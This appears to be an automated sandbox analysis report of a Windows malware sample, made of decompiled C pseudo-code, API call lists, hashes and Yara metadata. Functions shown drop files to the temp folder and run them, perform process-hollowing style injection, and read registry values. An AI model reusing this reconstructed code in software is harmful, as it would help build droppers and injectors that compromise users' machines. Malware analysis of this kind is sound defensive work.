				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}

0x00406bab
0x00406bba
0x00406bc4
0x00406bc7
0x00406bd2
0x00406be4
0x00406be9
0x00406c03
0x00406c03
0x00406beb
0x00406bee
0x00406bef
0x00406bfa
0x00406c1a
0x00406c23
0x00406c28
0x00406c3e
0x00406c44
0x00406c47
0x00406c5a
0x00406c61
0x00406c66
0x00406c49
0x00406c49
0x00406c52
0x00000000
0x00406c52
0x00406c2a
0x00406c2a
0x00406c2b
0x00406c30
0x00406c30
0x00406bfc
0x00406bfd
0x00000000
0x00406c02
0x00406bfa
0x00406bd4
0x00406bd4
0x00406bd4
0x00406c6e
0x00406bbc
0x00406bbf
0x00406bbf

APIs

IsBadCodePtr.KERNEL32 ref: 00406BB2

Strings

PromptOnSecureDesktop, xrefs: 00406BC0

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Code
String ID: PromptOnSecureDesktop
API String ID: 3609698214-2980165447
Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C

Uniqueness

Uniqueness Score: -1.00%

Function 022392B4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83filestringCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000400,?), ref: 022392CB
wsprintfA.USER32 ref: 02239339
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0223935E
lstrlen.KERNEL32(?,?,00000000), ref: 02239372
WriteFile.KERNEL32(00000000,?,00000000), ref: 0223937D
CloseHandle.KERNEL32(00000000), ref: 02239384

Strings

PromptOnSecureDesktop, xrefs: 02239314, 0223932C, 02239347

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID: PromptOnSecureDesktop
API String ID: 2439722600-2980165447
Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction ID: fb533fd68e603075960d7e075922191225a06b303dfc7cca71e49f958927c554
Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction Fuzzy Hash: 9B11E7F26102147BEB216765EC09FEF3A7EDFC9710F018065BB09E5094EEB04E458A64

Uniqueness

Uniqueness Score: -1.00%

Function 00409064, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}

0x0040907b
0x00409088
0x0040908e
0x00409095
0x0040909c
0x004090a8
0x004090b4
0x004090c9
0x004090ca
0x004090e9
0x004090f8
0x00409114
0x00409118
0x00000000
0x0040913f
0x0040912d
0x00409134
0x00000000

APIs

GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
wsprintfA.USER32 ref: 004090E9
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
CloseHandle.KERNEL32(00000000), ref: 00409134

Strings

PromptOnSecureDesktop, xrefs: 0040906D, 004090C4, 004090DC, 004090F7

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID: PromptOnSecureDesktop
API String ID: 2439722600-2980165447
Opcode ID: 604c9dfb72d4c575960ef67a32ff120fb0d8ccbeb60d369b3b0ad4a9b30ad2f3
Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
Opcode Fuzzy Hash: 604c9dfb72d4c575960ef67a32ff120fb0d8ccbeb60d369b3b0ad4a9b30ad2f3
Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668

Uniqueness

Uniqueness Score: -1.00%

Function 022399CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02239A01
GetThreadContext.KERNEL32(?,?), ref: 02239A3B
TerminateProcess.KERNEL32(?,00000000), ref: 02239A49
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02239A81
SetThreadContext.KERNEL32(?,00010002), ref: 02239A9E
ResumeThread.KERNEL32(?), ref: 02239AAB

Strings

D, xrefs: 022399F9

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D
API String ID: 2981417381-2746444292
Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction ID: 0003646181e9c446e4873800fba0614a6e13c57acf72ebc9c704531c15539957
Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction Fuzzy Hash: A7216DB1D11219BBDB12DBE1DC08EEF7BBCEF06754F004160FA08E1154EBB58A84CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 02231BEC, Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(004102D8), ref: 02231C01
LoadLibraryA.KERNEL32(004102C8), ref: 02231C0F
GetProcessHeap.KERNEL32 ref: 02231C6D
RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02231C86
RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02231CAA
HeapFree.KERNEL32(?,00000000,00000000), ref: 02231CEB
FreeLibrary.KERNEL32(?), ref: 02231CF4

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
String ID:
API String ID: 2324436984-0
Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction ID: e9ab7a878063000a52fdeedd518222cec2297a0635dd818edde50c15582a6c54
Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction Fuzzy Hash: E6318DB291021ABFCB129FE4DC888AEBBB9EB45705B24447AF509E2110D7B44E90DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3CA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4;
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

0x0040e3ca
0x0040e3e0
0x0040e3ee
0x0040e528
0x0040e52d
0x0040e52d
0x0040e3f4
0x0040e3f9
0x0040e3fb
0x0040e3fb
0x0040e3fe
0x0040e3fe
0x0040e400
0x0040e401
0x0040e407
0x0040e409
0x0040e40f
0x0040e413
0x0040e413
0x0040e41c
0x0040e421
0x0040e429
0x0040e42c
0x0040e42f
0x0040e43a
0x0040e452
0x0040e51d
0x0040e520
0x00000000
0x0040e458
0x0040e458
0x0040e458
0x0040e45b
0x0040e463
0x0040e469
0x0040e46e
0x0040e484
0x0040e48a
0x00000000
0x00000000
0x0040e491
0x0040e494
0x0040e499
0x0040e4a1
0x00000000
0x00000000
0x0040e4a3
0x0040e4a6
0x0040e4a9
0x0040e4ae
0x0040e4b4
0x0040e4b9
0x0040e4d3
0x00000000
0x00000000
0x0040e4d5
0x0040e4da
0x00000000
0x00000000
0x0040e4dc
0x0040e4df
0x0040e4e1
0x0040e4e6
0x00000000
0x00000000
0x00000000
0x0040e4e6
0x0040e4e8
0x0040e4ea
0x0040e500
0x0040e50e
0x0040e516
0x0040e516
0x00000000
0x0040e4ea

APIs

RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520

Strings

PromptOnSecureDesktop, xrefs: 0040E3D0

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID: PromptOnSecureDesktop
API String ID: 1586453840-2980165447
Opcode ID: b5fb4b8fc3318eb2bf5fbd1982c6cd7534101f3087d2227e42e74e88d469657a
Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
Opcode Fuzzy Hash: b5fb4b8fc3318eb2bf5fbd1982c6cd7534101f3087d2227e42e74e88d469657a
Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64

Uniqueness

Uniqueness Score: -1.00%

Function 00404280, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404280(intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}

0x00404290
0x00404296
0x0040429b
0x004042b1
0x004042ba
0x004043c1
0x004043ca
0x004043cd
0x00000000
0x004043ce
0x004042c0
0x004042c3
0x004042c8
0x00000000
0x00000000
0x004042dc
0x004042e6
0x00404300
0x004043bb
0x00000000
0x00404318
0x00404322
0x0040432c
0x00404333
0x00404336
0x00404342
0x00404345
0x00404350
0x00404359
0x0040435f
0x00404366
0x00404371
0x00404375
0x00404368
0x00404368
0x00404368
0x00404384
0x0040438a
0x0040439a
0x004043ab
0x004043ae
0x004043b5
0x00000000
0x004043b5
0x00404300
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
CloseHandle.KERNEL32(00000001), ref: 004043AE

Strings

PromptOnSecureDesktop, xrefs: 004042A9

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateEvent
String ID: PromptOnSecureDesktop
API String ID: 1371578007-2980165447
Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02236CB0, Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02236CCD
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02236D0B
GetLastError.KERNEL32 ref: 02236D90
CloseHandle.KERNEL32(?), ref: 02236D9E
GetLastError.KERNEL32 ref: 02236DBF
DeleteFileA.KERNEL32(?), ref: 02236DD0
GetLastError.KERNEL32 ref: 02236DE6

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
String ID:
API String ID: 3873183294-0
Opcode ID: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction ID: c6cb9a16b45263b72ce4e6a43704410fb1855443abe867a83c31926782c6e070
Opcode Fuzzy Hash: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction Fuzzy Hash: 1831EEB291024DBFCB129FE49D44AEEBFBDEF49310F148066F251E7214D7708A858B68

Uniqueness

Uniqueness Score: -1.00%

Function 02239395, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 022393AF
GetModuleFileNameA.KERNEL32(00000000), ref: 022393B6
CharToOemA.USER32(?,?), ref: 022393C4
wsprintfA.USER32 ref: 022393F9

Part of subcall function 022392B4: GetTempPathA.KERNEL32(00000400,?), ref: 022392CB
Part of subcall function 022392B4: wsprintfA.USER32 ref: 02239339
Part of subcall function 022392B4: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0223935E
Part of subcall function 022392B4: lstrlen.KERNEL32(?,?,00000000), ref: 02239372
Part of subcall function 022392B4: WriteFile.KERNEL32(00000000,?,00000000), ref: 0223937D
Part of subcall function 022392B4: CloseHandle.KERNEL32(00000000), ref: 02239384

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02239431

Strings

PromptOnSecureDesktop, xrefs: 022393E3, 022393E8, 02239405

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID: PromptOnSecureDesktop
API String ID: 3857584221-2980165447
Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction ID: 9ebc60c0a84fce92d8138dfaab599cc098ad67ea0281a79c060d1bcd11f3e95b
Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction Fuzzy Hash: 190152F69002187BD721A7A19D89FDF377CDB95701F0040A1BB49E2080DAF496C58F75

Uniqueness

Uniqueness Score: -1.00%

Function 00409145, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}

0x00409145
0x00409166
0x00409174
0x0040917a
0x00409180
0x00409181
0x004091a9
0x004091b6
0x004091c9
0x004091d3
0x00000000
0x004091e1
0x004091ea

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
CharToOemA.USER32 ref: 00409174
wsprintfA.USER32 ref: 004091A9

Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1

Strings

PromptOnSecureDesktop, xrefs: 0040914E, 00409193, 00409198, 004091B5

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID: PromptOnSecureDesktop
API String ID: 3857584221-2980165447
Opcode ID: f6aed4ccaae47c7b42f07b5ef4a98d75cdec17ec76c22536cb1b197f5410ce84
Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
Opcode Fuzzy Hash: f6aed4ccaae47c7b42f07b5ef4a98d75cdec17ec76c22536cb1b197f5410ce84
Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68

Uniqueness

Uniqueness Score: -1.00%

Function 0223AA11, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0223AACE

Strings

localcfg, xrefs: 0223AD5B
, xrefs: 0223AB9C

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: $localcfg
API String ID: 1659193697-2018645984
Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction ID: 76e07cdde9d87ffa589fd1ad772a3e23e8f82a98c95920b03e866cb4b9ccaf45
Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction Fuzzy Hash: 14715EF2A7030ABADF238BD8DC85FEE776AAB10705F144436F585A2098DFB589848715

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8A1, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

0x0040e8a1
0x0040e8ac
0x0040e8af
0x0040e8b7
0x0040e8c0
0x0040e8c3
0x0040e8c6
0x0040e917
0x0040e91a
0x0040e932
0x0040e93a
0x0040e93a
0x0040e943
0x0040e947
0x0040e94a
0x0040e96a
0x0040e96d
0x0040e971
0x0040e974
0x0040e94c
0x0040e94f
0x0040e95c
0x0040e95f
0x0040e962
0x0040e965
0x0040e965
0x0040e979
0x0040ea3a
0x0040ea4f
0x0040ea59
0x0040ea5d
0x0040ea68
0x0040ea6a
0x0040ea6d
0x0040ea6d
0x0040e97f
0x0040e985
0x0040e98f
0x0040e994
0x0040e9a1
0x0040e9a6
0x0040e9b8
0x0040e9c0
0x0040e9c7
0x0040e9dd
0x0040ea02
0x0040ea0c
0x0040ea16
0x0040ea19
0x0040ea22
0x0040ea28
0x0040ea28
0x0040e994
0x0040ea77
0x0040ea77
0x0040ea83
0x0040ea83
0x0040e8d1
0x0040e8d4
0x0040e8d7
0x0040e8de
0x0040e8ea
0x0040e8ed
0x0040e8f5
0x0040e8fc
0x0040e90a
0x0040e90c
0x0040e911
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5

